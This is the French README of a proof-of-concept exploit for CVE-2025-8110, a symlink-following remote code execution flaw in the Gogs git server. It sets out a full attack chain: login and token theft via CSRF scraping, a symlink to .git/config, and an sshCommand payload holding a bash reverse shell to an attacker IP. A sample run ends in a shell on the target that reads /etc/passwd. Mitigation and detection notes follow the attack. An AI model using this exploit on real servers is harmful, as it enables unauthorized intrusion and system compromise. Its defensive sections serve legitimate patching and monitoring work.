
Exploit PoC pour CVE-2025-8110
CVE-2025-8110 est une vulnérabilité critique dans Gogs qui permet à des attaquants authentifiés d'exécuter du code à distance via la manipulation de liens symboliques dans un dépôt. Cette preuve de concept illustre la chaîne d'exploitation complète, de l'authentification à l'obtention d'un shell inversé.
La vulnérabilité existe car Gogs suit les liens symboliques lors du traitement des fichiers de dépôt via son API, permettant à un attaquant de lire et de modifier des fichiers sensibles comme .git/config. En injectant une directive malveillante, des commandes système arbitraires peuvent être exécutées avec les privilèges du compte de service Gogs.
sshCommandScore CVSS : 7.2 (Élevé)
Vecteur d'attaque : Réseau
Authentification requise : Oui
Interaction utilisateur : Aucune
Impact : Compromission complète du système
requests>=2.28.0
beautifulsoup4>=4.11.0
rich>=13.0.0
urllib3>=1.26.0
git clone https://github.com/oguiii/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
CVE-2025-8110/
├── CVE-2025-8110.py # Main exploit script
├── requirements.txt # Python dependencies
└── README.md # Documentation
| Option | Description | Requis |
|---|---|---|
-u, --url | URL de base de Gogs (ex. https://gogs.example.com) | Oui |
-lh, --host | Adresse IP de l'attaquant pour le shell inversé | Oui |
-lp, --port | Port de l'attaquant pour le shell inversé | Oui |
-U, --username | Nom d'utilisateur Gogs | Oui |
-P, --password | Mot de passe Gogs | Oui |
-x, --proxy | Activer le proxy (localhost:8080) | Non |
-v, --verbose | Activer la sortie verbose | Non |
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -x
python3 CVE-2025-8110.py -u https://target-gogs.local -lh 10.10.14.15 -lp 4444 -U admin -P password123 -v
┌─────────────────────────────────────────────────────────────────────────────┐
│ CVE-2025-8110 Exploitation Chain │
└─────────────────────────────────────────────────────────────────────────────┘
Step 1: Authentication
├── Navigate to /user/login
├── Extract CSRF token from login page
├── Submit credentials with CSRF token
└── Establish authenticated session
Step 2: Application Token Generation
├── Navigate to /user/settings/applications
├── Extract CSRF token from settings page
├── Generate new application token
└── Extract token from response
Step 3: Malicious Repository Creation
├── Create repository via API with auto_init
├── Generate random repository name
└── Obtain repository URL
Step 4: Symlink Upload
├── Clone repository locally
├── Create symlink pointing to .git/config
├── Add, commit, and push changes
└── Verify successful upload
Step 5: RCE Exploitation
├── Craft malicious .git/config with sshCommand
├── Base64 encode configuration content
├── Upload via API to symlink target
└── Trigger command execution
Step 6: Reverse Shell
├── Connection established to attacker host
├── Interactive shell access
└── Command execution on target
Gogs ne parvient pas à assainir correctement le parcours des liens symboliques lors du traitement des fichiers de dépôt via son API. Lorsqu'un fichier est accédé via le point de terminaison API, Gogs suit les liens symboliques sans validation, permettant l'accès à des fichiers sensibles en dehors du répertoire du dépôt.
Création du lien symbolique
ln -s .git/config malicious_link
git add malicious_link
git commit -m "Add symlink"
git push origin master
Configuration malveillante
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
Exploitation de l'API
PUT /api/v1/repos/{username}/{repo}/contents/malicious_link
Authorization: token {application_token}
{
"message": "Exploit CVE-2025-8110",
"content": "base64_encoded_config"
}
def extract_csrf(html_text):
"""Parse CSRF token from hidden input with multiple fallback methods."""
# Method 1: Input with name _csrf
soup = BeautifulSoup(html_text, "html.parser")
token_input = soup.select_one("input[name='_csrf']")
if token_input and token_input.get("value"):
return token_input.get("value")
# Method 2: Input with name csrf_token
token_input = soup.select_one("input[name='csrf_token']")
if token_input and token_input.get("value"):
return token_input.get("value")
# Method 3: Meta tag with CSRF
meta_tag = soup.find("meta", {"name": "_csrf"})
if meta_tag and meta_tag.get("content"):
return meta_tag.get("content")
# Method 4: Regex pattern in script tags
pattern = r'"csrf_token"\s*:\s*"([^"]+)"'
match = re.search(pattern, html_text)
if match:
return match.group(1)
# Method 5: Regex for hidden input
pattern = r'<input[^>]*name="[_-]csrf"[^>]*value="([^"]+)"'
match = re.search(pattern, html_text, re.IGNORECASE)
if match:
return match.group(1)
raise ValueError("CSRF token not found in form response")
git_config = f"""[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
ignorecase = true
precomposeunicode = true
sshCommand = {command}
[remote "origin"]
url = git@localhost:gogs/{repo_name}.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
"""
# Attacker machine (10.10.14.15)
nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
# Execute exploit
python3 CVE-2025-8110.py -u https://gogs.internal.local -lh 10.10.14.15 -lp 4444 -U admin -P SecurePass123
[INFO] Starting CVE-2025-8110 exploit
[INFO] Target URL: https://gogs.internal.local
[INFO] Attacker host: 10.10.14.15:4444
[INFO] Username: admin
[INFO] Authenticating to Gogs...
[INFO] Login CSRF token found: abc123def456...
[SUCCESS] Authenticated successfully
[INFO] Retrieving application token...
[INFO] Settings CSRF token found: xyz789uvw012...
[SUCCESS] Application token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0
[INFO] Creating malicious repository...
[SUCCESS] Repository created: 6f7e8d9c0a1b
[INFO] Uploading malicious symlink...
[INFO] Cloning repository...
[INFO] Creating symlink: malicious_link -> .git/config
[INFO] Committing and pushing changes...
[SUCCESS] Symlink uploaded successfully
[INFO] Sending exploit payload...
[SUCCESS] Exploit sent, check your listener!
[INFO] Command: bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
[SUCCESS] Exploit likely successful (timeout indicates reverse shell)
Connection received on 10.10.14.15:4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ whoami
gogs
bash-5.0$ id
uid=1000(gogs) gid=1000(gogs) groups=1000(gogs)
bash-5.0$ pwd
/home/gogs/gogs-repositories/admin/6f7e8d9c0a1b.git
bash-5.0$ hostname
gogs-server
bash-5.0$ uname -a
Linux gogs-server 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 GNU/Linux
bash-5.0$ cat /etc/passwd | head -3
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
Pour vérifier votre version de Gogs :
# Access the Gogs web interface and check footer
# Or use the API
curl https://gogs.example.com/api/v1/version
Mettre à jour Gogs
# Backup existing installation
cp -r /home/gogs/gogs /home/gogs/gogs.backup
# Download and install latest version
wget https://dl.gogs.io/gogs_latest_linux_amd64.zip
unzip gogs_latest_linux_amd64.zip
cd gogs
./gogs web
Désactiver le support des liens symboliques
# In custom/conf/app.ini
[repository]
DISABLE_SYMLINKS = true
Implémenter la validation des entrées
# Limit access to Gogs API
iptables -A INPUT -p tcp --dport 3000 -s trusted_subnet -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
Activité du dépôt
Activité de l'API
/api/v1/repos/*/contents/*.git/config via l'APIIndicateurs système
# Check Gogs access logs for API exploitation
grep "/api/v1/repos" /var/log/gogs/access.log | grep PUT
# Monitor for symlink creation in repositories
find /home/gogs/gogs-repositories -type l
# Check for suspicious git config modifications
grep -r "sshCommand" /home/gogs/gogs-repositories/
# Monitor for outbound connections
ss -tunp | grep gogs
{
"event_type": "gogs_api_access",
"severity": "high",
"indicators": [
"PUT /api/v1/repos/*/contents/*",
"sshCommand in git config",
"random hex repository names"
],
"recommended_actions": [
"Review repository creation logs",
"Check for symlink files",
"Verify API access patterns"
]
}
Cette vulnérabilité a été découverte et divulguée de manière responsable à l'équipe de développement de Gogs. L'éditeur a publié un correctif dans la version 0.12.6.
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Les utilisateurs doivent :
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
Licence MIT
Copyright (c) 2025 oguiii
La permission est accordée, gratuitement, à toute personne obtenant une copie de ce logiciel et des fichiers de documentation associés (le « Logiciel »), de traiter le Logiciel sans restriction, y compris sans limitation les droits d'utiliser, copier, modifier, fusionner, publier, distribuer, sous-licencier et/ou vendre des copies du Logiciel, et d'autoriser les personnes à qui le Logiciel est fourni à le faire, sous réserve des conditions suivantes :
La mention de copyright ci-dessus et cette autorisation doivent être incluses dans toutes les copies ou parties substantielles du Logiciel.
LE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS MAIS SANS S'Y LIMITER LES GARANTIES DE QUALITÉ MARCHANDE, D'ADÉQUATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. EN AUCUN CAS, LES AUTEURS OU TITULAIRES DU DROIT D'AUTEUR NE POURRONT ÊTRE TENUS RESPONSABLES DE TOUTE RÉCLAMATION, DOMMAGE OU AUTRE RESPONSABILITÉ, QUE CE SOIT DANS LE CADRE D'UNE ACTION EN RESPONSABILITÉ CONTRACTUELLE, DÉLICTUELLE OU AUTRE, DÉCOULANT DE, OU EN LIEN AVEC LE LOGICIEL OU SON UTILISATION, OU D'AUTRES INTERACTIONS AVEC LE LOGICIEL.
Réalisé avec dévouement par oguiii